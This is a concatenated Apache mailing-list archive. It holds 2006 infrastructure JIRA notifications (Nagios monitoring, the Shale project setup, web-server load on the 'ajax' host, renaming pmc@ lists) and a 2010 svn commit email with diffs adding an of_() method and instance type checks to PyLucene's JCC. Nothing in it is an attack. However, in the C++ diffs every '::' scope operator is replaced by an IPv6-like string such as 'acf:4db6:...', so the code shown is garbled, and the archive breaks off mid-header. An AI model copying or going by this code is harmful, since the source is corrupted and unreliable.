List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 28438 invoked by uid 99); 29 Jun 2006 15:17:07 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Jun 2006 08:17:07 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Jun 2006 08:17:07 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id BD7AA410005 for <[email protected]>; Thu, 29 Jun 2006 15:15:29 +0000 (GMT) Message-ID: <9697254.1151594129773.JavaMail.jira@brutus> Date: Thu, 29 Jun 2006 15:15:29 +0000 (GMT+00:00) From: "Sander Striker (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-870) Update nagios monitoring to include all machines/services acurately MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Update nagios monitoring to include all machines/services acurately ------------------------------------------------------------------- Key: INFRA-870 URL: http://issues.apache.org/jira/browse/INFRA-870 Project: Infrastructure Type: Task Security: public (Regular issues) Components: InfraTools Reporter: Sander Striker Update nagios monitoring to include all machines/services not already in there. Update services that have moved. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 29 16:15:13 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 81539 invoked from network); 29 Jun 2006 16:15:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Jun 2006 16:15:12 -0000 Received: (qmail 27147 invoked by uid 500); 29 Jun 2006 16:15:10 -0000 Delivered-To: [email protected] Received: (qmail 26819 invoked by uid 500); 29 Jun 2006 16:15:09 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 26808 invoked by uid 99); 29 Jun 2006 16:15:09 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Jun 2006 09:15:09 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Jun 2006 09:15:08 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id CACE0410123 for <[email protected]>; Thu, 29 Jun 2006 16:13:30 +0000 (GMT) Message-ID: <934153.1151597610827.JavaMail.jira@brutus> Date: Thu, 29 Jun 2006 16:13:30 +0000 (GMT+00:00) From: "Wendy Smoak (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-866) Create Shale TLP In-Reply-To: <13908927.1151540729787.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-866?page=comments#action_12418490 ] Wendy Smoak commented on INFRA-866: ----------------------------------- > Will you be wanting a fresh directory, or is there a directory within Struts that you would want moving to be that directory (once lists are setup)? Shale has a trunk/branches/tags structure underneath Struts that can simply be moved over: https://svn.apache.org/repos/asf/struts/shale/ Thanks! > Create Shale TLP > ---------------- > > Key: INFRA-866 > URL: http://issues.apache.org/jira/browse/INFRA-866 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Reporter: Craig McClanahan > > As approved by the Board at the June 2006 meeting, please set up the infrastrcture for the Shale TLP: > #======================================= > [1] Root Tasks (do these need to be mailed separately?) > Create unix group "shale" > Add following usernames to group "shale": craigmcc, jmitchell, greddin, schof, wsmoak, gvanmatre, matzew > Create new DNS entry "shale.apache.org" and configure into website server instance > #======================================= > [2] Mailing Lists > [2.1] Addresses > [email protected] > [email protected] > [email protected] > [email protected] > [email protected] > [email protected] > [2.2] Setup Characteristics > All lists except pmc should be set up to require subscription before posting, have the Reply-To header set, and suppress trailers. > PMC list should also require moderation for subscription requests > [2.3] Initial Moderators For All Lists > Craig McClanahan <[email protected]> (may also need <[email protected]> if moderation is fussy about Sender: heading) > James Mitchell <[email protected]> > Wendy Smoak <[email protected]> > Gary VanMatre <[email protected]> > [2.4] Archives > http://shale.apache.org/mail/dev/YYYYMM.gz > http://shale.apache.org/mail/users/YYYYMM.gz > http://shale.apache.org/mail/commits/YYYYMM.gz > http://shale.apache.org/mail/issues/YYYYMM.gz > http://shale.apache.org/mail/notifications/YYYYMM.gz > http://shale.apache.org/mail/pmc/YYYYMM.gz (Restricted access???) > #======================================= > [3] Source Repository > As PMC chair, I volunteer to be a Subversion admin, and can set up the new space, authorizations, and copy/move old sources myself. > Commit notifications should go to [email protected] > #======================================= > [4] Issue Tracker > We'd like to stick with JIRA, and are open to being in either the common JIRA instance, the Struts one, or a new instance just for Shale. > #======================================= > [5] Wiki > New wiki instance "http://wiki.apache.org/shale" on MoinMoin. > #======================================= > [6] Initial Committer list > Craig McClanahan <[email protected]> > James Mitchell <[email protected]> > Greg Reddin <[email protected]> > Sean Schofield <[email protected]> > Wendy Smoak <[email protected]> > Gary VanMatre <[email protected]> > Matthias Wessendorf <[email protected] -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 30 02:42:14 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45166 invoked from network); 30 Jun 2006 02:42:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Jun 2006 02:42:12 -0000 Received: (qmail 26297 invoked by uid 500); 30 Jun 2006 02:42:09 -0000 Delivered-To: [email protected] Received: (qmail 26015 invoked by uid 500); 30 Jun 2006 02:42:08 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 26000 invoked by uid 99); 30 Jun 2006 02:42:08 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Jun 2006 19:42:08 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Jun 2006 19:42:07 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C6922410005 for <[email protected]>; Fri, 30 Jun 2006 02:40:29 +0000 (GMT) Message-ID: <12638568.1151635229789.JavaMail.jira@brutus> Date: Fri, 30 Jun 2006 02:40:29 +0000 (GMT+00:00) From: "Joe Schaefer (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-871) Replace ajax with eos MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Replace ajax with eos --------------------- Key: INFRA-871 URL: http://issues.apache.org/jira/browse/INFRA-871 Project: Infrastructure Type: Bug Security: public (Regular issues) Components: ColoTasks Reporter: Joe Schaefer When google comes knocking, ajax's load can exceed 50 for extended periods of time. The load is primarily due to inadequate disk performance, and is gradually getting worse as time goes on. Currently the sustained load spikes happen about 2-3 times per week, but back in April, before moving the www sites to ajax, the load rarely topped 30. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 30 03:05:14 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 49432 invoked from network); 30 Jun 2006 03:05:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Jun 2006 03:05:11 -0000 Received: (qmail 43665 invoked by uid 500); 30 Jun 2006 03:05:09 -0000 Delivered-To: [email protected] Received: (qmail 43424 invoked by uid 500); 30 Jun 2006 03:05:09 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 43412 invoked by uid 99); 30 Jun 2006 03:05:08 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Jun 2006 20:05:08 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Jun 2006 20:05:08 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 2EEAA410005 for <[email protected]>; Fri, 30 Jun 2006 03:03:30 +0000 (GMT) Message-ID: <23313802.1151636610174.JavaMail.jira@brutus> Date: Fri, 30 Jun 2006 03:03:30 +0000 (GMT+00:00) From: "Ian Holsman (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-871) Replace ajax with eos In-Reply-To: <12638568.1151635229789.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-871?page=comments#action_12418560 ] Ian Holsman commented on INFRA-871: ----------------------------------- would it make more sense for both eos and ajax to be setup so both sites share the load (via DNS round robin or something) > Replace ajax with eos > --------------------- > > Key: INFRA-871 > URL: http://issues.apache.org/jira/browse/INFRA-871 > Project: Infrastructure > Type: Bug > Security: public(Regular issues) > Components: ColoTasks > Reporter: Joe Schaefer > > When google comes knocking, ajax's load can exceed 50 for extended periods of time. > The load is primarily due to inadequate disk performance, and is gradually getting worse > as time goes on. Currently the sustained load spikes happen about 2-3 times per week, > but back in April, before moving the www sites to ajax, the load rarely topped 30. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 30 13:34:24 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30777 invoked from network); 30 Jun 2006 13:34:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Jun 2006 13:34:22 -0000 Received: (qmail 56870 invoked by uid 500); 30 Jun 2006 13:34:12 -0000 Delivered-To: [email protected] Received: (qmail 56338 invoked by uid 500); 30 Jun 2006 13:34:09 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 56321 invoked by uid 99); 30 Jun 2006 13:34:09 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 30 Jun 2006 06:34:09 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 30 Jun 2006 06:34:09 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 686CB41033C for <[email protected]>; Fri, 30 Jun 2006 13:32:30 +0000 (GMT) Message-ID: <8603154.1151674350425.JavaMail.jira@brutus> Date: Fri, 30 Jun 2006 13:32:30 +0000 (GMT+00:00) From: "Joshua Slive (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-871) Replace ajax with eos In-Reply-To: <12638568.1151635229789.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-871?page=comments#action_12418644 ] Joshua Slive commented on INFRA-871: ------------------------------------ I think we should start by getting rid of SSI, which is just going to exacerbate this problem at a number of levels. Then yes, we should also have at least two machines hosting the main websites. And third, we should check that the mod_cache performance on the wiki is still adequate. I'll try to get to this if I can. > Replace ajax with eos > --------------------- > > Key: INFRA-871 > URL: http://issues.apache.org/jira/browse/INFRA-871 > Project: Infrastructure > Type: Bug > Security: public(Regular issues) > Components: ColoTasks > Reporter: Joe Schaefer > > When google comes knocking, ajax's load can exceed 50 for extended periods of time. > The load is primarily due to inadequate disk performance, and is gradually getting worse > as time goes on. Currently the sustained load spikes happen about 2-3 times per week, > but back in April, before moving the www sites to ajax, the load rarely topped 30. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 30 13:34:24 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30586 invoked from network); 30 Jun 2006 13:34:21 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Jun 2006 13:34:21 -0000 Received: (qmail 56622 invoked by uid 500); 30 Jun 2006 13:34:10 -0000 Delivered-To: [email protected] Received: (qmail 56320 invoked by uid 500); 30 Jun 2006 13:34:09 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 56271 invoked by uid 99); 30 Jun 2006 13:34:09 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 30 Jun 2006 06:34:09 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 30 Jun 2006 06:34:08 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C8B71410339 for <[email protected]>; Fri, 30 Jun 2006 13:32:29 +0000 (GMT) Message-ID: <27827186.1151674349791.JavaMail.jira@brutus> Date: Fri, 30 Jun 2006 13:32:29 +0000 (GMT+00:00) From: "Joe Schaefer (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-872) Rename all pmc@ lists private@ MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Rename all pmc@ lists private@ ------------------------------ Key: INFRA-872 URL: http://issues.apache.org/jira/browse/INFRA-872 Project: Infrastructure Type: Bug Security: public (Regular issues) Components: Mailing Lists Reporter: Joe Schaefer Currently the new account creation scripts assume the name of a pmc lists is [email protected]. This is no longer true; new tlp's are being created with private@tlp instead. Unfortunately the account creation script assumes the pmc list is named [email protected]. I would like to fix the account creation script by assuming every pmc can be reached via [email protected]. I don't care if the existing lists are renamed, or additional aliases are created. The board passed some resolution in this regard, it's probably time we started enforcing it. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 30 15:39:19 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 71281 invoked from network); 30 Jun 2006 15:39:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Jun 2006 15:39:17 -0000 Received: (qmail 17343 invoked by uid 500); 30 Jun 2006 15:39:12 -0000 Delivered-To: [email protected] Received: (qmail 17047 invoked by uid 500); 30 Jun 2006 15:39:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 16927 invoked by uid 99); 30 Jun 2006 15:39:10 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 30 Jun 2006 08:39:10 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 30 Jun 2006 08:39:09 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id DADF7410341 for <[email protected]>; Fri, 30 Jun 2006 15:37:30 +0000 (GMT) Message-ID: <18494007.1151681850891.JavaMail.jira@brutus> Date: Fri, 30 Jun 2006 15:37:30 +0000 (GMT+00:00) From: "Joshua Slive (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-871) Replace ajax with eos In-Reply-To: <12638568.1151635229789.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-871?page=comments#action_12418668 ] Joshua Slive commented on INFRA-871: ------------------------------------ I've turned off SSI and tested the cache hit ratio on the wiki. It is up around 70% and should get a little better now that I've turned off some stupid cache-busting behavior on image attachments. > Replace ajax with eos > --------------------- > > Key: INFRA-871 > URL: http://issues.apache.org/jira/browse/INFRA-871 > Project: Infrastructure > Type: Bug > Security: public(Regular issues) > Components: ColoTasks > Reporter: Joe Schaefer > > When google comes knocking, ajax's load can exceed 50 for extended periods of time. > The load is primarily due to inadequate disk performance, and is gradually getting worse > as time goes on. Currently the sustained load spikes happen about 2-3 times per week, > but back in April, before moving the www sites to ajax, the load rarely topped 30. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira
From [email protected] Sat Apr 03 23:27:27 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 97381 invoked from network); 3 Apr 2010 23:27:27 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 3 Apr 2010 23:27:27 -0000 Received: (qmail 24666 invoked by uid 500); 3 Apr 2010 23:27:27 -0000 Delivered-To: [email protected] Received: (qmail 24645 invoked by uid 500); 3 Apr 2010 23:27:27 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <pylucene-commits.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 24637 invoked by uid 99); 3 Apr 2010 23:27:27 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 03 Apr 2010 23:27:27 +0000 X-ASF-Spam-Status: No, hits=-1234.3 required=10.0 tests=ALL_TRUSTED,AWL X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 03 Apr 2010 23:27:25 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 991B823888CD; Sat, 3 Apr 2010 23:27:05 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r930603 - in /lucene/pylucene/trunk/jcc: CHANGES jcc/python.py jcc/sources/JCCEnv.cpp jcc/sources/JCCEnv.h jcc/sources/functions.cpp jcc/sources/macros.h Date: Sat, 03 Apr 2010 23:27:05 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: vajda Date: Sat Apr 3 23:27:05 2010 New Revision: 930603 URL: http://svn.apache.org/viewvc?rev=930603&view=rev Log: - added support for of_() method to set instance type parameters Modified: lucene/pylucene/trunk/jcc/CHANGES lucene/pylucene/trunk/jcc/jcc/python.py lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.cpp lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.h lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp lucene/pylucene/trunk/jcc/jcc/sources/macros.h Modified: lucene/pylucene/trunk/jcc/CHANGES URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/CHANGES?rev=930603&r1=930602&r2=930603&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/CHANGES (original) +++ lucene/pylucene/trunk/jcc/CHANGES Sat Apr 3 23:27:05 2010 @@ -6,8 +6,9 @@ Version 2.5 -> - added support for extracting JAVAHOME from Windows registry (Bill Janssen) - updated MANIFEST.in as sdist started creating incomplete source archives - improved support for building on Windows with mingw32 (Bill Janssen) - - added support for --find-jvm-dll jvm.dll (Bill Janssen) + - added support for --find-jvm-dll parameter (Bill Janssen) - fixed bug with not inheriting type parameters to inner parameterized classes + - added support for of_() method to set instance type parameters - Version 2.4 -> 2.5 Modified: lucene/pylucene/trunk/jcc/jcc/python.py URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/python.py?rev=930603&r1=930602&r2=930603&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/python.py (original) +++ lucene/pylucene/trunk/jcc/jcc/python.py Sat Apr 3 23:27:05 2010 @@ -563,6 +563,10 @@ def python(env, out_h, out, cls, superCl line(out, indent, 'static PyObject *t_%s_cast_(PyTypeObject *type, PyObject *arg);', names[-1]) line(out, indent, 'static PyObject *t_%s_instance_(PyTypeObject *type, PyObject *arg);', names[-1]) + if clsParams: + line(out, indent, + 'static PyObject *t_%s_of_(t_%s *self, PyObject *args);', + names[-1], names[-1]) if constructors: line(out, indent, 'static int t_%s_init_(t_%s *self, PyObject *args, PyObject *kwds);', names[-1], names[-1]) @@ -799,6 +803,9 @@ def python(env, out_h, out, cls, superCl 'DECLARE_METHOD(t_%s, cast_, METH_O | METH_CLASS),', names[-1]) line(out, indent + 1, 'DECLARE_METHOD(t_%s, instance_, METH_O | METH_CLASS),', names[-1]) + if clsParams: + line(out, indent + 1, + 'DECLARE_METHOD(t_%s, of_, METH_VARARGS),', names[-1]) for name, methods in allMethods: modifiers = methods[0].getModifiers() @@ -1009,6 +1016,20 @@ def python(env, out_h, out, cls, superCl line(out, indent + 1, 'Py_RETURN_TRUE;') line(out, indent, '}') + if clsParams: + line(out) + line(out, indent, + 'static PyObject *t_%s_of_(t_%s *self, PyObject *args)', + names[-1], names[-1]) + line(out, indent, '{') + line(out, indent + 1, + 'if (!parseArg(args, "T", %d, &(self->parameters)))', + len(clsParams)) + line(out, indent + 2, 'Py_RETURN_SELF;'); + line(out, indent + 1, + 'return PyErr_SetArgsError((PyObject *) self, "of_", args);') + line(out, indent, '}') + if constructors: line(out) line(out, indent, 'static int t_%s_init_(t_%s *self, PyObject *args, PyObject *kwds)', names[-1], names[-1]) Modified: lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.cpp?rev=930603&r1=930602&r2=930603&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.cpp (original) +++ lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.cpp Sat Apr 3 23:27:05 2010 @@ -160,6 +160,11 @@ jobject JCCEnvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bnumerationNext(jobject return callObjectMethod(obj, _mids[mid_enumeration_nextElement]); } +jboolean JCCEnvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bisInstanceOf(jobject obj, jclass (*initializeClass)()) +{ + return get_vm_env()->IsInstanceOf(obj, (*initializeClass)()); +} + jclass JCCEnvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bindClass(const char *className) const { jclass cls = NULL; Modified: lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.h URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.h?rev=930603&r1=930602&r2=930603&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.h (original) +++ lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.h Sat Apr 3 23:27:05 2010 @@ -137,6 +137,8 @@ public: virtual jstring getJavaVersion() const; virtual jclass findClass(const char *className) const; + virtual jboolean isInstanceOf(jobject obj, jclass (*initializeClass)()); + virtual void registerNatives(jclass cls, JNINativeMethod *methods, int n) const; Modified: lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp?rev=930603&r1=930602&r2=930603&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp (original) +++ lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp Sat Apr 3 23:27:05 2010 @@ -499,6 +499,29 @@ int _parseArgs(PyObject **args, unsigned case 'o': /* java.lang.Object */ break; + case 'T': /* tuple of python types with wrapfn_ */ + { + static PyObject *wrapfn_ = PyString_FromString("wrapfn_"); + int len = va_arg(list, int); + + if (PyTuple_Check(arg)) + { + if (PyTuple_GET_SIZE(arg) != len) + return -1; + + for (int i = 0; i < len; i++) { + PyObject *type = PyTuple_GET_ITEM(arg, i); + + if (!(type == Py_None || + (PyType_Check(type) && + PyObject_HasAttr(type, wrapfn_)))) + return -1; + } + break; + } + return -1; + } + default: return -1; } @@ -881,6 +904,22 @@ int _parseArgs(PyObject **args, unsigned break; } + case 'T': /* tuple of python types with wrapfn_ */ + { + int len = va_arg(check, int); + PyTypeObject **types = va_arg(list, PyTypeObject **); + + for (int i = 0; i < len; i++) { + PyObject *type = PyTuple_GET_ITEM(arg, i); + + if (type == Py_None) + types[i] = NULL; + else + types[i] = (PyTypeObject *) type; + } + break; + } + default: return -1; } @@ -1239,7 +1278,8 @@ void installType(PyTypeObject *type, PyO PyObject *wrapType(PyTypeObject *type, const jobject& obj) { - PyObject *cobj = PyObject_GetAttrString((PyObject *) type, "wrapfn_"); + static PyObject *wrapfn_ = PyString_FromString("wrapfn_"); + PyObject *cobj = PyObject_GetAttr((PyObject *) type, wrapfn_); PyObject *(*wrapfn)(const jobject&); if (cobj == NULL) Modified: lucene/pylucene/trunk/jcc/jcc/sources/macros.h URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/sources/macros.h?rev=930603&r1=930602&r2=930603&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/sources/macros.h (original) +++ lucene/pylucene/trunk/jcc/jcc/sources/macros.h Sat Apr 3 23:27:05 2010 @@ -113,8 +113,14 @@ PyObject *t_namacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bwrap_jobject(const job { \ if (!!object) \ { \ - t_name *self = \ - (t_name *) name##$$Type.tp_alloc(&name##$$Type, 0); \ + if (!env->isInstanceOf(object, javaClassacf:4db6:5e0b:f386:43a5:35d7:718d:3c8binitializeClass)) \ + { \ + PyErr_SetObject(PyExc_TypeError, \ + (PyObject *) &name##$$Type); \ + return NULL; \ + } \ + t_name *self = (t_name *) \ + name##$$Type.tp_alloc(&name##$$Type, 0); \ if (self) \ self->object = javaClass(object); \ return (PyObject *) self; \ @@ -139,6 +145,12 @@ PyObject *t_namacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bwrap_jobject(const job Py_RETURN_FALSE; \ } +#define Py_RETURN_SELF \ + { \ + Py_INCREF(self); \ + return (PyObject *) self; \ + } + #if PY_VERSION_HEX < 0x02040000 From [email protected] Sun Apr 04 03:20:03 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 22602 invoked from network); 4 Apr 2010 03:20:02 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 4 Apr 2010 03:20:02 -0000 Received: (qmail 1917 invoked by uid 500); 4 Apr 2010 03:20:02 -0000 Delivered-To: [email protected] Received: (qmail 1902 invoked by uid 500); 